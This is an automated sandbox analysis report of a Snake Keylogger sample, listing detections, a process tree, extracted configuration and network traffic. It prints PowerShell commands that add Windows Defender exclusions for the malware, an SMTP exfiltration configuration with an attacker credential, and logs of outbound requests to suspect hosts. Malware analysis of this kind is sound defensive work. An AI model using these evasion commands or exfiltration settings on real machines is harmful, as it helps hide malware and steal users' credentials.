Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report lfQuSBwdSf.exe

Overview

General Information

Sample Name:lfQuSBwdSf.exe
Analysis ID:383847
MD5:0802967c1d72deeb4e1b79af74fdb553
SHA1:f8edbbed8318311f070167c73fcca9f63f79c905
SHA256:201872c79f07606d9874bc471acf1999e0eef0703e73c71a4a297eb56c70bcfb
Tags:exeSnakeKeylogger
Infos:

Most interesting Screenshot:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Startup

  • System is w10x64
  • lfQuSBwdSf.exe (PID: 2788 cmdline: 'C:\Users\user\Desktop\lfQuSBwdSf.exe' MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
    • powershell.exe (PID: 1004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 720 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lfQuSBwdSf.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1000 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3984 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6248 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • lfQuSBwdSf.exe (PID: 6864 cmdline: C:\Users\user\Desktop\lfQuSBwdSf.exe MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
    • WerFault.exe (PID: 6164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 2300 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6528 cmdline: 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
  • svchost.exe (PID: 6624 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6712 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6872 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6908 cmdline: 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' MD5: 0802967C1D72DEEB4E1B79AF74FDB553)
    • powershell.exe (PID: 4424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5092 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3348 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7152 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5232 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "SMTP Info": {"Port": "587", "SMTP Credential": "bal@nobettwo.xyzKvgnCIGBE8+Hnobettwo.xyz"}}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
    00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
        00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmpJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            23.2.svchost.exe.4a72390.5.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
              23.2.svchost.exe.4a72390.5.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                23.2.svchost.exe.4ad53b0.6.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                  23.2.svchost.exe.4ad53b0.6.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                    23.2.svchost.exe.4ad53b0.6.raw.unpackJoeSecurity_BedsObfuscatorYara detected Beds ObfuscatorJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "SMTP Info": {"Port": "587", "SMTP Credential": "bal@nobettwo.xyzKvgnCIGBE8+Hnobettwo.xyz"}}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeReversingLabs: Detection: 29%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: lfQuSBwdSf.exeVirustotal: Detection: 24%Perma Link
                      Source: lfQuSBwdSf.exeReversingLabs: Detection: 29%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: lfQuSBwdSf.exeJoe Sandbox ML: detected
                      Source: 21.2.lfQuSBwdSf.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
                      Source: unknownHTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.3:49701 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49725 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49737 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49777 version: TLS 1.0
                      Source: lfQuSBwdSf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbOS source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341939107.00000000013F2000.00000004.00000020.sdmp
                      Source: Binary string: npAjVisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbs source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp
                      Source: Binary string: (P6jLC:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb, source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1G source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: C:\Users\user\Desktop\lfQuSBwdSf.PDB source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.341262404.00000000013C2000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdby source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp
                      Source: Binary string: .pdb%H source: lfQuSBwdSf.exe, 00000000.00000002.333378140.00000000010F7000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: lfQuSBwdSf.exe, 00000000.00000002.342059141.00000000013FA000.00000004.00000020.sdmp

                      Networking:

                      barindex
                      May check the online IP address of the machineShow sources
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeDNS query: name: checkip.dyndns.org
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeDNS query: name: checkip.dyndns.org
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeDNS query: name: checkip.dyndns.org
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeDNS query: name: checkip.dyndns.org
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: Joe Sandbox ViewIP Address: 162.88.193.70 162.88.193.70
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: unknownHTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.3:49701 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49725 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49737 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49777 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
